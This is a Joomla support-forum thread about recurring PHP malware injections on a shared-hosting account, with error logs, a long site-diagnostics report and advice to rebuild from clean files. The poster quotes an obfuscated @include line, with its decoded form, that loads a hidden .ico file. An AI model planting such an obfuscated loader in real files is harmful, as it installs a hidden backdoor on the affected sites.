Page 1 of 1

I'm getting constant php injections

Posted: Wed Apr 24, 2019 8:05 pm
by alsunna
Constant

Despite installing security pro and RSFirewall and cleaning all injected php files I'm getting same sql injectiosn into the PHP files like this (see attached):

/9f961/

@include "\057ho\155e3\057al\163un\156a/\160ub\154ic\137ht\155l/\142ec\157me\155us\154im\057pl\165gi\156s/\146ie\154ds\057in\164eg\145r/\05670\14601\061c1\056ic\157";

/9f961/

When I decode this msg, it comes to injecting .ico file:
@include "/home/sneakers/public_html/wp-content/plugins/[youtube]-embed-plus/.484229fd.ico";

Does any of you know how we can block php injections?
I have same issue as this guy http://www.webhostingtalk.com/showthread.php?t=1642283


In server error log to find hole: too many errors of :
[08-May-2017 02:09:21 America/Chicago] PHP Deprecated: Automatically populating $HTTP_RAW_POST_DATA is deprecated and will be removed in a future version. To avoid this warning set 'always_populate_raw_post_data' to '-1' in php.ini and use the php://input stream instead. in Unknown on line 0
[11-May-2017 21:29:42 America/Chicago] PHP Deprecated: Automatically populating $HTTP_RAW_POST_DATA is deprecated and will be removed in a future version. To avoid this warning set 'always_populate_raw_post_data' to '-1' in php.ini and use the php://input stream instead. in Unknown on line 0

Re: I'm getting constant php injections

Posted: Thu Apr 25, 2019 4:09 am
by Giraffex
The best way to protect yourself is through the current Joomla system. But this will not help when poor quality components are installed on the website. Often they are the ones that cause hackers to break into websites.

Re: I'm getting constant php injections

Posted: Thu Apr 25, 2019 4:49 am
by mandville
Please run post the results of the fpa

Re: I'm getting constant php injections

Posted: Thu Apr 25, 2019 9:25 am
by Tpy
Have you tried a security component? Try to install RSFirewall and make a scan of your website.

Re: I'm getting constant php injections

Posted: Thu Apr 25, 2019 5:51 pm
by alsunna
We tried to install RSFirewall, and it shows me the infected files.
We clean them, a week later they come back. We have a hosting with 10 sites with Joomla and one WP that are injected weekly.

Re: I'm getting constant php injections

Posted: Thu Apr 25, 2019 6:57 pm
by mandville

Re: I'm getting constant php injections

Posted: Thu Apr 25, 2019 7:03 pm
by Per Yngve Berg
Is this hosted on a VPS?

You have to isolate the sites by installing with a separate OS user for each site to prevent cross site contamination.

It also looks like the vulnerably is in the WP site.

Re: I'm getting constant php injections

Posted: Tue Apr 30, 2019 9:50 pm
by alsunna
It's on shared hostgator account. VPS is too costly for 12 sites. They are all Joomla sites.

We tried WP to see if it helps but then WP php files got injected too.

I still get codes in PHP like this:
/9f961/

@include "\057ho\155e3\057al\163un\156a/\160ub\154ic\137ht\155l/\142ec\157me\155us\154im\057pl\165gi\156s/\146ie\154ds\057in\164eg\145r/\05670\14601\061c1\056ic\157";

/9f961/

When I decode this msg, it comes to injecting .ico file:
@include "/home/sneakers/public_html/wp-content/plugins/[[youtube]]-embed-plus/.484229fd.ico";

Re: I'm getting constant php injections

Posted: Wed May 01, 2019 7:48 am
by Per Yngve Berg
We are still waiting for the FPA report as requested several times.

Re: I'm getting constant php injections

Posted: Wed May 01, 2019 4:03 pm
by alsunna
Forum Post Assistant (v1.4.8 (koine)) : 1st May 2019 wrote:
Last PHP Error(s) Reported :: wrote:[30-Apr-2019 17:02:10 America/Chicago] PHP Parse error: syntax error, unexpected end of file, expecting variable (T_VARIABLE) or '{' or '$' in /fpa-en.php on line 2327
Basic Environment :: wrote:Joomla! Instance :: Joomla! 3.9.5-Stable (Amani) 9-April-2019
Joomla! Platform :: Joomla Platform 13.1.0-Stable (Curiosity) 24-Apr-2013
Joomla! Configured :: Yes | Read-Only (444) | Owner: --protected-- . (uid: 1/gid: 1) | Group: --protected-- (gid: 1) | Valid For: 3.9
Configuration Options :: Offline: false | SEF: true | SEF Suffix: false | SEF ReWrite: true | .htaccess/web.config: Yes | GZip: true | Cache: false | CacheTime: 30 | CacheHandler: file | CachePlatformPrefix: false | FTP Layer: false | Proxy: false | LiveSite: | Session lifetime: 15 | Session handler: database | Shared sessions: false | SSL: 0 | Error Reporting: none | Site Debug: false | Language Debug: false | Default Access: 1 | Unicode Slugs: false | dbConnection Type: mysqli | PHP Supports J! 3.9.5: Yes | Database Supports J! 3.9.5: Yes | Database Credentials Present: Yes |

Host Configuration :: OS: Linux | OS Version: 3.10.0-693.17.1.2.ELK.el6.x86_64 | Technology: x86_64 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: --protected-- | System TMP Writable: Yes | Free Disk Space : 122.64 GiB |

PHP Configuration :: Version: 7.1.14 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 32759 | Log Errors To: error_log | Last Known Error: 30th April 2019 17:02:10. | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: /home3/alsunna/public_html:/tmp:/home3/alsunna/public_html/info/tmp:/home3/alsunna/public_html/info/logs | Uploads: 1 | Max. Upload Size: 64M | Max. POST Size: 64M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 256M

Database Configuration :: Version: 5.6.41-84.1 (Client:5.6.41-84.1) | Host: --protected-- (--protected--) | default Collation: utf8_general_ci (default Character Set: utf8) | Database Size: 201.67 MiB | #of Tables:  206
Detailed Environment :: wrote:PHP Extensions :: Core (7.1.14) | date (7.1.14) | libxml (7.1.14) | openssl (7.1.14) | pcre (7.1.14) | sqlite3 (7.1.14) | zlib (7.1.14) | bcmath (7.1.14) | bz2 (7.1.14) | calendar (7.1.14) | ctype (7.1.14) | curl (7.1.14) | dom (20031129) | hash (1.0) | fileinfo (1.0.5) | filter (7.1.14) | ftp (7.1.14) | gd (7.1.14) | gettext (7.1.14) | gmp (7.1.14) | SPL (7.1.14) | iconv (7.1.14) | session (7.1.14) | intl (1.1.0) | json (1.5.0) | mbstring (7.1.14) | mcrypt (7.1.14) | mysqli (7.1.14) | odbc (7.1.14) | standard (7.1.14) | PDO (7.1.14) | pdo_mysql (7.1.14) | pdo_sqlite (7.1.14) | Phar (2.0.2) | posix (7.1.14) | pspell (7.1.14) | Reflection (7.1.14) | imap (7.1.14) | SimpleXML (7.1.14) | soap (7.1.14) | sockets (7.1.14) | exif (7.1.14) | tidy (7.1.14) | tokenizer (7.1.14) | wddx (7.1.14) | xml (7.1.14) | xmlreader (7.1.14) | xmlrpc (7.1.14) | xmlwriter (7.1.14) | xsl (7.1.14) | zip (1.13.5) | cgi-fcgi () | SourceGuardian (11.1.5) | ionCube Loader () | Zend Engine (3.1.0) |
Potential Missing Extensions ::
Disabled Functions :: system | shell_exec | passthru | exec | popen | proc_open |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: No | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) | administrator/logs/ (---) |

Elevated Permissions (First 10) ::
Database Information :: wrote:Database statistics :: Uptime: 1844993 | Threads: 18 | Questions: 1689456911 | Slow queries: 22725 | Opens: 19266941 | Flush tables: 1 | Open tables: 16800 | Queries per second avg: 915.698 |
Extensions Discovered :: wrote:Components :: SITE ::
Core :: com_wrapper (3.0.0) 1 | com_mailto (3.0.0) 1 |
3rd Party:: WF_FILESYSTEM_JOOMLA_TITLE (2.6.11) ? | WF_AGGREGATOR_VIMEO_TITLE (2.6.11) ? | WF_AGGREGATOR_[youtube]_TITLE (2.6.11) ? | WF_AGGREGATOR_DAILYMOTION_TITLE (2.6.11) ? | WF_AGGREGATOR_VINE_TITLE (2.6.11) ? | WF_POPUPS_WINDOW_TITLE (2.6.11) ? | WF_POPUPS_JCEMEDIABOX_TITLE (2.6.11) ? | FLEXIcontent Links (2.3.0-rc) ? | WF_LINKS_JOOMLALINKS_TITLE (2.6.11) ? | WF_LINK_SEARCH_TITLE (2.6.11) ? | WF_CLEANUP_TITLE (2.6.11) ? | WF_LINK_TITLE (2.6.11) ? | WF_ANCHOR_TITLE (2.6.11) ? | WF_FULLSCREEN_TITLE (2.6.11) ? | WF_CHARMAP_TITLE (2.6.11) ? | WF_KITCHENSINK_TITLE (2.6.11) ? | WF_VISUALBLOCKS_TITLE (2.6.11) ? | WF_IMGMANAGER_TITLE (2.6.11) ? | WF_SEARCHREPLACE_TITLE (2.6.11) ? | WF_TEXTCASE_TITLE (2.6.11) ? | WF_HR_TITLE (2.6.11) ? | WF_FONTCOLOR_TITLE (2.6.11) ? | WF_VISUALCHARS_TITLE (2.6.11) ? | WF_NONBREAKING_TITLE (2.6.11) ? | WF_SOURCE_TITLE (2.6.11) ? | WF_INLINEPOPUPS_TITLE (2.6.11) ? | WF_CLIPBOARD_TITLE (2.6.11) ? | WF_SPELLCHECKER_TITLE (2.6.11) ? | WF_BROWSER_TITLE (2.6.11) ? | WF_CONTEXTMENU_TITLE (2.6.11) ? | WF_XHTMLXTRAS_TITLE (2.6.11) ? | WF_STYLESELECT_TITLE (2.6.11) ? | WF_TABLE_TITLE (2.6.11) ? | WF_DIRECTIONALITY_TITLE (2.6.11) ? | WF_PREVIEW_TITLE (2.6.11) ? | WF_EMOTIONS_TITLE (2.6.11) ? | WF_FONTSELECT_TITLE (2.6.11) ? | WF_LISTS_TITLE (2.6.11) ? | WF_MEDIA_TITLE (2.6.11) ? | WF_PRINT_TITLE (2.6.11) ? | WF_FORMATSELECT_TITLE (2.6.11) ? | WF_ARTICLE_TITLE (2.6.11) ? | WF_AUTOSAVE_TITLE (2.6.11) ? | WF_FONTSIZESELECT_TITLE (2.6.11) ? | WF_STYLE_TITLE (2.6.11) ? | WF_LAYER_TITLE (2.6.11) ? |

Components :: ADMIN ::
Core :: com_search (3.0.0) 1 | com_messages (3.0.0) 1 | com_contenthistory (3.2.0) 1 | com_postinstall (3.2.0) 1 | com_templates (3.0.0) 1 | com_modules (3.0.0) 1 | com_content (3.0.0) 1 | com_checkin (3.0.0) 1 | com_tags (3.1.0) 1 | com_users (3.0.0) 1 | com_admin (3.0.0) 1 | com_languages (3.0.0) 1 | com_media (3.0.0) 1 | com_ajax (3.2.0) 1 | com_categories (3.0.0) 1 | com_finder (3.0.0) 1 | com_fields (3.7.0) 1 | com_associations (3.7.0) 1 | com_config (3.0.0) 1 | com_newsfeeds (3.0.0) 1 | com_plugins (3.0.0) 1 | com_weblinks (3.5.0) 1 | com_cpanel (3.0.0) 1 | com_redirect (3.0.0) 1 | com_menus (3.0.0) 1 | com_banners (3.0.0) 1 | com_cache (3.0.0) 1 | com_actionlogs (3.9.0) 1 | com_installer (3.0.0) 1 | com_joomlaupdate (3.6.2) 1 | com_privacy (3.9.0) 1 | com_login (3.0.0) 1 |
3rd Party:: COM_JCE (2.6.11) 1 | Akeeba (6.4.2.1) 1 | COM_GANTRY (4.1.40) 1 | Securitycheck Pro (3.1.5) 1 | Facebook Recommendations bar (1.0) ? | Linkedin company profile (1.0) ? | Social share button (1.0) ? | Facebook Activity Feed (1.0) ? | Twitter feed (1.0) ? | Linkedin member profile (1.0) ? | Linkedin Build a Jobs (1.0) ? | Facebook Embedded Posts (1.0) ? | Facebook Commend (1.0) ? | Google Interactive posts (1.0) ? | Facebook Like Box (1.0) ? | Google Comment (1.0) ? | Linkedin Apply button (1.0) ? | Google Badge (1.0) ? | Facebook Recommendations box (1.0) ? | Linkedin company Insider (1.0) ? | Facebook Facepile (1.0) ? | Login button (1.0) ? | BT_SocialConnect (1.2.1) 1 | Facebook Profile (1.0) ? | Google page (1.0) ? | Facebook Page (1.0) ? | Linkedin Companies (1.0) ? | Facebook Groups (1.0) ? | Linkedin Groups (1.0) ? | Twitter Profile (1.0) ? | Linkedin Profile (1.0) ? | Mailing (1.0) ? | EasySlider (2.1.4) 0 | sh404SEF (4.4.4.1791) 1 | plg_installer_sh404sef (4.4.4.1791) 1 | sh404sef - Default component suppor (4.4.4.1791) ? | sh404sef - Offline code plugin (4.4.4.1791) 1 | sh404sef - Similar urls plugin (4.4.4.1791) 1 | PLG_SH404SEFCORE_SH404SEFSOCIAL (4.4.4.1791) 1 | sh404sef - Analytics plugin (4.4.4.1791) 1 | plg_system_shlib (0.2.9.370) 1 | sh404sef - System plugin (4.4.4.1791) 1 | sh404sef - System mobile template s (4.4.4.1791) ? | sh404sef control panel icon (4.4.4.1791) 1 | com_jhackguard (2.0.2) 1 | RokSprocket (2.1.23) 1 | JMap (2.0.2) 1 | com_gantry5 (5.0.0-rc.1) 1 | COM_SPUPGRADE (4.1.1) 1 | Mailster (1.5.1) 1 | RSFirewall! (2.11.25) 1 | SP Simple Portfolio (1.3) ? | com_uniterevolution2 (4.3.8 b5) 1 | com_djimageslider (3.2.1) 1 | Bt_Portfolio (3.0.9) 1 | SP Page Builder (2.4.1) 1 |

Modules :: SITE ::
Core :: mod_tags_popular (3.1.0) 1 | mod_login (3.0.0) 1 | mod_articles_categories (3.0.0) 1 | mod_articles_category (3.0.0) 1 | mod_finder (3.0.0) 1 | mod_menu (3.0.0) 1 | mod_random_image (3.0.0) 1 | mod_whosonline (3.0.0) 1 | mod_weblinks (3.5.0) 1 | mod_syndicate (3.0.0) 1 | mod_articles_news (3.0.0) 1 | mod_articles_popular (3.0.0) 1 | mod_custom (3.0.0) 1 | mod_articles_latest (3.0.0) 1 | mod_stats (3.0.0) 1 | mod_languages (3.5.0) 1 | mod_related_items (3.0.0) 1 | mod_feed (3.0.0) 1 | mod_banners (3.0.0) 1 | mod_wrapper (3.0.0) 1 | mod_search (3.0.0) 1 | mod_tags_similar (3.1.0) 1 | mod_breadcrumbs (3.0.0) 1 | mod_users_latest (3.0.0) 1 | mod_footer (3.0.0) 1 | mod_articles_archive (3.0.0) 1 |
3rd Party:: BT Login (2.5.6) 1 | SP Simple Portfolio Module (1.3) ? | JSN EasySlider (2.1.4) 1 | BT Twitter Feeds (2.2) 1 | MOD_RANDOM_IMAGE_EXTENDED (3.3.0) 1 | BT Content Showcase (2.4.2) 1 | Hyper News Ticker (1.0) 1 | RokNavMenu (2.0.9) ? | ThemeHippo Pricing Table (1.0) 1 | CT Random Article (1.0.0) 1 | News Show SP2 (2.2) 1 | SP Page Builder (1.1) 1 | mod_news_pro_gk4 (GK4 3.4.0) 1 | BT Slideshow Pro (2.1.8) 1 | RokAjaxSearch (2.0.6) 1 | DJ-ImageSlider (3.2.1) 1 | Latest News + (2.1.3) 1 | Random Article (1.4.1.78) 1 | SP Facebook (1.4) 1 | BT Simple Slideshow (1.0.2) 1 | Custom Inline HTML (1.0) 1 | BT Google Maps (2.0.8) 1 | Mailster Subscriber (1.5.1) 1 | Hijri Date (1.0.1) 1 | Sj K2 Mega News (2.5) 1 | MOD_LATESTNEWSENHANCED (3.0.4) 1 | RokSprocket Module (2.1.6) ? | AP Smart LayerSlider (3.4) ? | SP Tweet (2.2.0) 1 | JA Image Hotspot (1.1.4) 1 |

Modules :: ADMIN ::
Core :: mod_title (3.0.0) 1 | mod_latestactions (3.9.0) 1 | mod_login (3.0.0) 1 | mod_toolbar (3.0.0) 1 | mod_quickicon (3.0.0) 1 | mod_menu (3.0.0) 1 | mod_stats_admin (3.0.0) 1 | mod_privacy_dashboard (3.9.0) 1 | mod_custom (3.0.0) 1 | mod_logged (3.0.0) 1 | mod_sampledata (3.8.0) ? | mod_popular (3.0.0) 1 | mod_feed (3.0.0) 1 | mod_multilangstatus (3.0.0) 1 | mod_submenu (3.0.0) 1 | mod_latest (3.0.0) 1 | mod_version (3.0.0) 1 | mod_status (3.0.0) 1 |
3rd Party:: RSFirewall! Control Panel Module (1.4.0) 1 | sh404sef control panel icon (4.4.4.1791) 1 | mod_sppagebuilder_admin_menu (1.1) ? | mod_sppagebuilder_icons (1.0.2) ? | Securitycheck Pro Info Module (3.1.5) 1 |

Libraries :: SITE ::
Core ::
3rd Party:: RokCommon (3.2.0) 1 | file_fof30 (3.4.2) ? |

Plugins :: SITE ::
Core :: plg_fields_repeatable (3.9.0) 1 | plg_fields_list (3.7.0) 1 | plg_fields_user (3.7.0) 1 | plg_fields_text (3.7.0) 1 | plg_fields_editor (3.7.0) 1 | plg_fields_usergrouplist (3.7.0) 1 | plg_fields_integer (3.7.0) 1 | plg_fields_radio (3.7.0) 1 | plg_fields_calendar (3.7.0) 1 | plg_fields_sql (3.7.0) 1 | plg_fields_checkboxes (3.7.0) 1 | plg_fields_textarea (3.7.0) 1 | plg_fields_imagelist (3.7.0) 1 | plg_fields_color (3.7.0) 1 | plg_fields_media (3.7.0) 1 | plg_fields_url (3.7.0) 1 | plg_privacy_user (3.9.0) 1 | plg_privacy_message (3.9.0) 1 | plg_privacy_actionlogs (3.9.0) 1 | plg_privacy_content (3.9.0) 1 | plg_privacy_consents (3.9.0) 1 | plg_user_profile (3.0.0) ? | plg_user_terms (3.9.0) 0 | plg_user_joomla (3.0.0) 1 | plg_user_contactcreator (3.0.0) ? | plg_twofactorauth_yubikey (3.2.0) 1 | plg_twofactorauth_totp (3.2.0) 1 | plg_authentication_gmail (3.0.0) ? | plg_authentication_ldap (3.0.0) ? | plg_authentication_cookie (3.0.0) 1 | plg_authentication_joomla (3.0.0) 1 | plg_extension_joomla (3.0.0) 1 | PLG_ACTIONLOG_JOOMLA (3.9.0) 1 | PLG_INSTALLER_URLINSTALLER (3.6.0) 1 | plg_installer_packageinstaller (3.6.0) 1 | PLG_INSTALLER_FOLDERINSTALLER (3.6.0) 1 | plg_installer_webinstaller (2.0.1) 1 | plg_captcha_recaptcha_invisible (3.8) 0 | plg_captcha_recaptcha (3.4.0) ? | plg_quickicon_privacycheck (3.9.0) 1 | plg_quickicon_extensionupdate (3.0.0) 1 | plg_quickicon_phpversioncheck (3.7.0) 1 | plg_quickicon_joomlaupdate (3.0.0) 1 | plg_finder_weblinks (3.5.0) 1 | plg_finder_contacts (3.0.0) 1 | plg_finder_content (3.0.0) 1 | plg_finder_newsfeeds (3.0.0) 1 | plg_finder_tags (3.0.0) 1 | plg_finder_categories (3.0.0) 1 | plg_editors-xtd_fields (3.7.0) 1 | plg_editors-xtd_image (3.0.0) 1 | plg_editors-xtd_menu (3.7.0) 1 | plg_editors-xtd_module (3.5.0) 1 | plg_editors-xtd_pagebreak (3.0.0) 1 | plg_editors-xtd_readmore (3.0.0) 1 | plg_editors-xtd_article (3.0.0) 1 | plg_content_fields (3.7.0) 1 | plg_content_pagenavigation (3.0.0) 1 | plg_content_confirmconsent (3.9.0) 0 | plg_content_pagebreak (3.0.0) 1 | plg_content_emailcloak (3.0.0) 1 | plg_content_vote (3.0.0) 1 | plg_content_joomla (3.0.0) 1 | plg_content_finder (3.0.0) 1 | plg_content_loadmodule (3.0.0) 1 | plg_system_fields (3.7.0) 1 | plg_system_languagefilter (3.0.0) 0 | plg_system_debug (3.0.0) 1 | plg_system_p3p (3.0.0) 1 | plg_system_sef (3.0.0) 1 | plg_system_stats (3.5.0) ? | plg_system_log (3.0.0) 1 | plg_system_sessiongc (3.8.6) 1 | plg_system_highlight (3.0.0) 1 | plg_system_redirect (3.0.0) 0 | plg_system_cache (3.0.0) 1 | plg_system_remember (3.0.0) 1 | plg_system_languagecode (3.0.0) ? | plg_system_privacyconsent (3.9.0) 0 | PLG_SYSTEM_ACTIONLOGS (3.9.0) 0 | plg_system_logrotation (3.9.0) 1 | plg_system_logout (3.0.0) 1 | plg_system_updatenotification (3.5.0) 1 | plg_search_weblinks (3.5.0) 1 | plg_search_contacts (3.0.0) 1 | plg_search_content (3.0.0) 1 | plg_search_newsfeeds (3.0.0) 1 | plg_search_tags (3.0.0) 1 | plg_search_categories (3.0.0) 1 |
3rd Party:: RokPad (2.1.10) 1 | plg_editors_tinymce (4.5.9) 1 | plg_editors_jce (2.6.11) 1 | plg_editors_codemirror (5.40.0) 1 | BT AutoSubmit - Registration (1.0.0) 1 | plg_gantry5_preset (5.0.0-rc.1) 1 | plg_extension_jce (2.6.11) 1 | Extension - Inline editing Plugin H (1.0) ? | plg_installer_rsfirewall (1.0.0) 1 | plg_installer_jce (2.6.11) 1 | plg_installer_sh404sef (4.4.4.1791) 1 | Installer - Securitycheck Pro (3.1.5) 1 | Ajax - Inline content editing (1.0.2b) 1 | Ajax - Inline Mode State listener (1.0) 1 | Helix3 - Ajax (1.9) 1 | Ajax - TreeLink (1.0) 1 | sh404sef - Default component suppor (4.4.4.1791) ? | sh404sef - Offline code plugin (4.4.4.1791) 1 | sh404sef - Similar urls plugin (4.4.4.1791) 1 | PLG_SH404SEFCORE_SH404SEFSOCIAL (4.4.4.1791) 1 | sh404sef - Analytics plugin (4.4.4.1791) 1 | plg_quickicon_gantry5 (5.0.0-rc.1) 1 | plg_quickicon_jce (2.6.0-pro-bet) 1 | plg_quickicon_akeebabackup (6.4.2.1) 1 | Smart Search - mp3 Browser Fork (0.3.1) 1 | Editors-xtd - BT Shortcode (1.0.0) 1 | Button - RokBox (2.0.15) 1 | BT Widget - Button (1.0.0) 1 | JSN_EASYSLIDER_PLUGIN_BUTTON_TITLE (2.1.4) 0 | PLG_MP3BROWSER_SYS_NAME (0.3.1) 1 | Content - Inline content editing fi (1.0) ? | Content - Facebook Like And Share (5.5) 1 | Content - Rapid1Pixelout (3.5) 1 | Content - RokInjectModule (1.6) 1 | RokBox (2.0.15) 1 | Content - Inline content editing (1.0) 1 | plg_content_jce (2.6.11) 1 | JSN_EASYSLIDER_PLUGIN_CONTENT_TITLE (2.1.4) 0 | Mailster Subscriber (1.5.1) 1 | Content - BT Shortcode (1.0.0) 1 | BT AutoSubmit - Content (1.0.0) 1 | T3 Framework (2.7.4) 1 | System - Inline content editing (1.0) 1 | PLG_SYSTEM_AKEEBAACTIONLOG (6.4.2.1) 0 | JHackGuard Plugin (2.0.4) 1 | System - url Inspector (3.1.5) 0 | System - Securitycheck Pro Update D (1.0.2) ? | System - SP PageBuilder (1.1) ? | System - RokBox (2.0.15) 1 | System - RokCommon (3.2.5) 1 | System - Inline History (1.0) 1 | System - Reset SEF Base (3.0) 1 | plg_system_ef4_jmframework (4.8.4) 1 | plg_system_jmframework (3.12) 1 | System - RokExtender (2.0.0) ? | plg_system_gantry5 (5.0.0-rc.1) 1 | System - RokBooster (1.1.18) 0 | System - Securitycheck Pro (3.1.5) 1 | PLG_SYSTEM_BACKUPONUPDATE (6.4.2.1) 0 | plg_system_djjquerymonster (1.2.0) 1 | System - Joomla Media Manager Exten (1.0) ? | System - SP Page Builder Pro Update (1.0) ? | System - RokSprocket (2.1.6) 1 | manage.myJoomla.com Secure Plugin (n/a) ? | Mailster Email Forwarder (1.5.1) 1 | System - Helix3 Framework (1.9) 1 | System - RSFirewall! Active Scanner (1.4.0) 1 | plg_system_jce (2.6.11) 1 | System - Yjsg Framework (2.3.6) 1 | System - Securitycheck Pro Cron (3.1.5) 1 | plg_system_jsnframework (2.0.2) 1 | plg_system_shlib (0.2.9.370) 1 | PLG_SYSTEM_JCH_OPTIMIZE (5.0.5) ? | sh404sef - System plugin (4.4.4.1791) 1 | BT Social Connect - System (1.0.0) 1 | PLG_SYSTEM_JSNEASYSLIDER (2.1.4) 0 | System - Inline HTML Module Version (1.0) ? | PLG_SYSTEM_AKEEBAUPDATECHECK (6.4.2.1) 0 | sh404sef - System mobile template s (4.4.4.1791) ? | System - BT Shortcode (1.0.1) 1 | System - Gantry 4 (4.1.40) 1 | Mailster Profile (1.5.1) 1 | plg_search_sppagebuilder (1.2) ? |
Templates Discovered :: wrote:Templates :: SITE :: Flex (2.4) 1 | jm-wedding06 (1.02) 1 | protostar (1.0) 1 | beez3 (3.1.0) ? | rt_callisto (1.0.0) 1 |
Templates :: ADMIN :: hathor (3.0.0) 1 | isis (1.0) 1 |

Re: I'm getting constant php injections

Posted: Thu May 02, 2019 8:24 pm
by alsunna
Please advise.

Re: I'm getting constant php injections

Posted: Thu May 02, 2019 11:32 pm
by Webdongle
alsunna wrote:
Wed Apr 24, 2019 8:05 pm
...
Despite installing security pro and RSFirewall and cleaning all injected php files...
You have no real option except to delete your files and rebuild them. Please see viewtopic.php?f=714&t=946026

You have a lot of out of date extensions. Following the instructions of viewtopic.php?f=714&t=946026 (and the thread it links to) will clean your site and rebuild you files with fresh up to date ones. If you are unable to follow the instructions then perhaps consider professional help.

Re: I'm getting constant php injections

Posted: Sun May 05, 2019 6:19 am
by darb
First you can also then check so you dont have a local trojan on your own computer infecting your ftp client bcs it seems its an issue with two different kind of cms sites and I dont belive you could have timing of getting this problem at same time with Hostgator on several cms sites.

Never heard that Wordpress can spread virus to Joomla by a same hoster :pop

Re: I'm getting constant php injections

Posted: Thu May 09, 2019 5:18 pm
by alsunna
We have several sites under that hosting to delete all of them and re-install will take so much time and work.. my question is how do we block PHP injections? how to prevent it after we clean it?

Re: I'm getting constant php injections

Posted: Thu May 09, 2019 6:33 pm
by Webdongle
Yep a lot of work but you have little choice. Following the process viewtopic.php?f=714&t=946026 will remove the hack files and make sure your extensions are up to date and that you don't have vulnerable ones. You can start by performing it on the folders for the hacked site. That may be enough. But if you get hacked after that then you will need to do it for all the sites. Other than that hire a professional.